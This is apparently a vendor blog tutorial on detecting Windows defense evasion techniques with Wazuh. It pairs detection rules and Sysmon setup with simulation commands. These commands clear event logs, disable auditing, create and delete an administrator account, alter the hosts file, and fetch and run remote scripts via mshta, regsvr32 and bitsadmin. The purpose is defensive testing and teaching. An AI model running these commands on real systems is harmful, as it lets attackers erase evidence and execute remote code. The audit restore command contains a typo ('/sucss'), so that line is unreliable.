Detecting defense evasion techniques with Wazuh

| by John Olatunde | Wazuh 4.12.0
Post icon

Defense evasion techniques are methods that threat actors use to conceal their presence, bypass security mechanisms, and operate undetected on compromised systems. By evading detection, adversaries can maintain persistence and continue malicious activity even during active monitoring or security scans.

Common defense evasion methods include disabling or uninstalling security tools, tampering with event logs, obfuscating or encrypting malicious code, and abusing trusted system processes to hide their actions. Threat actors are also known to exploit trusted system processes to conceal their malicious activities.

This blog post covers how Wazuh detects common defense evasion techniques that malicious actors use to avoid detection on Windows endpoints.

Infrastructure

We use the following infrastructure to demonstrate the detection of defense evasion techniques with Wazuh:

  • A pre-built, ready-to-use Wazuh OVA 4.12.0, which includes the Wazuh central components (Wazuh server, Wazuh indexer, and Wazuh dashboard). Follow this guide to download and set up the Wazuh virtual machine.
  • A Windows 11 endpoint with the Wazuh agent 4.12.0 installed and enrolled to the Wazuh server. We monitor this endpoint to detect defense evasion techniques.

Sysmon configuration

Sysmon (System Monitor) is a Windows system utility from Microsoft’s Sysinternals suite that provides detailed event logging to help monitor and analyze system activity. It logs detailed information about process creation, network connections, file and registry changes, and other low-level events into the Windows event log. 

Follow the steps below to configure Sysmon on the monitored Windows endpoint and forward logs from the Sysmon event channel to the Wazuh server for analysis:

  1. Download the latest version of Sysmon from the Microsoft Sysinternals page.
  2. Extract the compressed Sysmon file to your preferred location.
  3. Download the Sysmon configuration file using PowerShell as an administrator. Replace <SYSMON_EXECUTABLE_PATH> with the path to your Sysmon executable:
> wget -Uri https://wazuh.com/resources/blog/emulation-of-attack-techniques-and-detection-with-wazuh/sysmonconfig.xml -OutFile <SYSMON_EXECUTABLE_PATH>\sysmonconfig.xml
  1. Switch to the folder containing the Sysmon executable. Run the command below to install and start Sysmon:
> .\Sysmon64.exe -accepteula -i sysmonconfig.xml
  1. Add the following configuration within the <ossec_config> block of the C:\Program Files (x86)\ossec-agent\ossec.conf file to forward Sysmon events to the Wazuh server:
 <localfile>
    <location>Microsoft-Windows-Sysmon/Operational</location>
    <log_format>eventchannel</log_format>
 </localfile>

6. Restart the Wazuh agent to apply the changes:

> Restart-Service -Name wazuh

Common defense evasion techniques and detection with Wazuh

The MITRE ATT&CK framework, which stands for MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK), is a knowledge base designed to model the behavior of cyber adversaries. Some commonly used MITRE defense evasion techniques on Windows endpoints include the following:

T1197 – BITS Jobs

Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer service accessed via Component Object Model (COM). It enables applications like updaters and messengers to transfer files in the background using idle network bandwidth, minimizing disruption to other network activity. BITS jobs can be abused by adversaries to persistently execute code and perform background tasks without detection.

Detection rules

1. Create a file defense_evasion_rules.xml in the /var/ossec/etc/rules/ directory of the Wazuh server:

# touch /var/ossec/etc/rules/defense_evasion_rules.xml

2. Add the following rule to the /var/ossec/etc/rules/defense_evasion_rules.xml file:

<group name="windows">
  <rule id="110001" level="5">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.commandLine" type="pcre2">(bitsadmin)(?=.*(/transfer|/download|/priority))</field>
    <description>Suspicious download and execution with BITS job on $(win.system.computer)</description>
    <mitre>
      <id>T1197</id>
    </mitre>
  </rule>
</group>

3. Restart the Wazuh manager for the changes to take effect:

# systemctl restart wazuh-manager

Attack simulation

This test simulates an adversary using bitsadmin.exe, which is available out-of-the-box on Windows, to download a payload. The payload, provided by Atomic Red Team, is used in adversary emulation to demonstrate the BITS Jobs technique. The downloaded file is a text file that contains the description of the BITS Jobs technique. Follow the steps below to simulate the defense evasion technique.

1. Run the command below on the Windows endpoint using Command Prompt:

> bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %localappdata%\Temp\bitsdownload.txt && start %localappdata%\Temp\bitsdownload.txt

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is 110001 to view the alerts on the Wazuh dashboard.

T1197 - BITS Jobs

After simulating this technique, run the following command using Command Prompt to remove the downloaded file.

> del %localappdata%\Temp\bitsdownload

T1562.002 – Impair Defenses: Disable Windows Event Logging

The Windows event log records key user and system activities such as logins and process creation, providing essential data for security tools and detections. Adversaries may tamper with system-wide logging or just that of a particular application to evade detection.

Detection rules

Wazuh provides the built-in rule 60112 that is triggered when the Windows Audit Policy is changed. 

Attack simulation

The auditpol utility is a Windows command-line tool used to view and configure audit policy settings on a local or remote system. This test simulates an adversary using the auditpol utility to disable Windows auditing, preventing both successful and failed authentication events from being recorded in the event logs. Follow the steps below to simulate the defense evasion technique.

1. Run the command below on the Windows endpoint using PowerShell with administrator privileges:

> auditpol /set /category:"Account Logon" /success:disable /failure:disable

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is 60112 to view the alerts on the Wazuh dashboard. 

T1562.002 - Impair Defenses: Disable Windows Event Logging

After simulating this technique, run the following command using PowerShell with administrator privileges to restore the audit policy.

> auditpol /set /category:"Account Logon" /sucss:enable /failure:enable

T1070.001 – Indicator Removal: Clear Windows Event Logs

Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs keep a record of events on a Windows endpoint. These logs provide valuable information for troubleshooting issues, monitoring system performance, and threat detection. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

Detection rules

Wazuh provides the built-in rules 63103 and 63104 to detect log clearing activities. Rule 63103 is triggered when the Security event log is cleared, while 63104 detects the clearing of other logs, such as System, Application, and others. 

Attack simulation

The Windows Events Utility, wevtutil, is a built-in command-line tool in Windows used to manage Event Logs and Event Log configurations. Attackers can abuse the wevtutil utility to clear Windows event logs and cover their tracks after performing malicious actions. This test simulates an adversary using the wevtutil to clear the System and Security logs. Follow the steps below to simulate the defense evasion technique.

1. Run the command below on the Windows endpoint using PowerShell with administrator privileges:

> wevtutil cl System; wevtutil cl Security

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is one of 63103,63104 to view the alerts on the Wazuh dashboard. 

T1070.001 - Indicator Removal: Clear Windows Event Logs

T1070.009 – Indicator Removal: Clear Persistence

Adversaries may clear artifacts of persistence to erase evidence of their presence on a compromised system. This includes removing services, deleting executables, modifying the registry, removing scheduled tasks, or performing other cleanup actions. They may also delete user accounts previously created for persistent access, making it harder for defenders to trace or investigate their activity.

Detection rules

Wazuh provides the following built-in rules to detect changes to user accounts and group memberships:

  • Rule ID 60109 – when a user account is enabled or created.
  • Rule ID 60110 – when a user account is changed.
  • Rule ID 60111 – when a user account is disabled or deleted.
  • Rule ID 60154 – when the administrators group changes.
  • Rule ID 60160 – when the domain users group changes.

Attack simulation

We simulate an attacker creating a local user account for persistence, then later deleting it as part of its cleanup phase to evade detection. Follow the steps below to simulate the defense evasion technique.

1. Run the commands below on the Windows endpoint using PowerShell with administrator privileges to simulate the new account creation and deletion. The command creates a new local account with the username T1070, assigns it to the local administrator group, and finally, deletes the newly created user:

> New-LocalUser -Name "T1070" -NoPassword
> Add-LocalGroupMember -Group "Administrators" -Member "T1070"
> Remove-LocalUser -Name "T1070"

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is one of 60109, 60110, 60111, 60154, 60160 to view the alerts on the Wazuh dashboard. 

Indicator Removal: Clear Persistence

T1218.005 – System Binary Proxy Execution: Mshta

The mshta.exe tool is a Windows utility used to execute Microsoft HTML Applications (HTA), which run outside the browser using Internet Explorer technologies. Adversaries may abuse mshta.exe to execute malicious HTA files, JavaScript, or VBScript, using its trusted status to bypass application control and browser security settings. Because it operates outside Internet Explorer’s security context, it can evade restrictions that typically apply within the browser.

Detection rules

1. Add the following rule to the defense_evasion_rules.xml file:

<group name="windows">
  <rule id="110002" level="5">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.commandLine" type="pcre2">(mshta)(?=.*(exec|close))</field>
    <description>Suspicious execution of a remote script with MSHTA on $(win.system.computer)</description>
    <mitre>
      <id>T1218.005</id>
    </mitre>
  </rule>
</group>

2. Restart the Wazuh manager for the changes to take effect:

# systemctl restart wazuh-manager

Attack simulation

This test simulates an adversary using mshta.exe to execute a remote payload. The payload, provided by Atomic Red Team, is used in adversary emulation to demonstrate the execution of a remote script using the mshta.exe tool. Upon execution, the calculator app calc.exe will be launched. Follow the steps below to simulate the defense evasion technique.

1. Run the command below on the Windows endpoint using Command Prompt:

> mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is 110002 to view the alerts on the Wazuh dashboard. 

System Binary Proxy Execution: Mshta

T1218.010 – System Binary Proxy Execution: Regsvr32

The regsvr32.exe tool is a command-line program used to register and unregister object linking and embedding controls, including Dynamic Link Libraries (DLLs), on Windows systems. It can also be used to bypass application control by loading COM scriptlets that execute DLLs under user permissions. Since regsvr32.exe supports network and proxy communication, attackers can pass a URL to a remote script as an argument, allowing it to be retrieved and executed on the endpoint. This capability enables adversaries to abuse regsvr32.exe to execute malicious code.

Detection rules

1. Add the following rule to the defense_evasion_rules.xml file:

<group name="windows">
  <rule id="110003" level="5">
    <if_sid>61603</if_sid>
    <field name="win.eventdata.commandLine" type="pcre2">(regsvr32)(?=.*(/s|/u|/i|scrobj))</field>
    <description>Suspicious remote code execution with Regsvr32 on $(win.system.computer)</description>
    <mitre>
      <id>T1218.010</id>
    </mitre>
  </rule>
</group>

2. Restart the Wazuh manager for the changes to take effect:

# systemctl restart wazuh-manager

Attack simulation

This test simulates an adversary using regsvr32.exe to execute a remote COM scriptlet. The scriptlet file provided by Atomic Red Team, is used in adversary emulation to demonstrate how threat actors can abuse regsvr32.exe. Upon execution, the calculator app calc.exe will be launched. Follow the steps below to simulate the defense evasion technique.

1. Run the command below on the Windows endpoint using Command Prompt:

> regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct scrobj.dll

2. Navigate to Threat Hunting > Events, then apply the filter rule.id: is 110003 to view the alerts on the Wazuh dashboard.

System Binary Proxy Execution: Regsvr32

T1014 – Rootkit

Rootkits are programs designed to conceal the presence of malware by intercepting or hooking operating system API calls that return system information. Adversaries may use rootkits to hide processes, files, network connections, services, drivers, and other system components. Some rootkits also interfere with system functionality by preventing antivirus software from downloading database updates or obstructing the installation of security patches. They may also alter system configurations to block access to trusted domains. This tactic ensures that security tools remain outdated or ineffective, allowing attackers to operate undetected for extended periods.

Detection rules

Wazuh detects rootkit activity using the Rootcheck module. The module is enabled by default on monitored endpoints and continuously checks for anomalies and known signatures. This enables the detection of both signature-based threats and stealthy malware that may evade traditional detection methods.

Attack simulation

This test simulates malware behavior that blocks security updates by modifying the endpoint’s hosts file. The hosts file is a local configuration file that maps domain names to IP addresses. By altering it, malware can redirect or block connections to trusted update servers, preventing antivirus software and operating systems from downloading critical patches. Follow the steps below on the Windows endpoint to simulate the defense evasion technique.

1. Run the commands below using PowerShell with administrator privileges to simulate malicious modification of the hosts file. The commands back up the hosts file and modify it to block connections to the Microsoft website. 

> Copy-Item -Path "C:\Windows\System32\drivers\etc\hosts" -Destination "C:\Windows\System32\drivers\etc\hosts.bak" -Force

> Add-Content -Path "C:\Windows\System32\drivers\etc\hosts" -Value "`n127.0.0.1 microsoft.com"

2. By default, the Rootcheck module runs scans every 12 hours. Run the commands below to restart the Wazuh agent and trigger a Rootcheck scan.

> Restart-Service -Name wazuh

3. Navigate to Threat Hunting > Events, then apply the filter rule.id: is 513 to view the alerts on the Wazuh dashboard.

Rootkit

After simulating this technique, run the command below using PowerShell with administrator privileges to restore the  C:\Windows\System32\drivers\etc\hosts file. 

> Copy-Item -Path "C:\Windows\System32\drivers\etc\hosts.bak" -Destination "C:\Windows\System32\drivers\etc\hosts" -Force

Conclusion

This post demonstrates how Wazuh detects defense evasion techniques on Windows endpoints by utilizing a combination of built-in and custom rules. We simulated various techniques used by threat actors for defense evasion and detected them with Wazuh. To enhance visibility, we enriched logs from the victim endpoint by integrating Sysmon logs with Wazuh, applying custom rules for certain techniques and relying on built-in rules for others.

If you have any questions about this blog post or Wazuh, we invite you to join our community, where our team will be happy to assist you.

Reference

Atomic Red Team Tests

Defense Evasion, Tactic TA0005 – Enterprise | MITRE ATT&CK®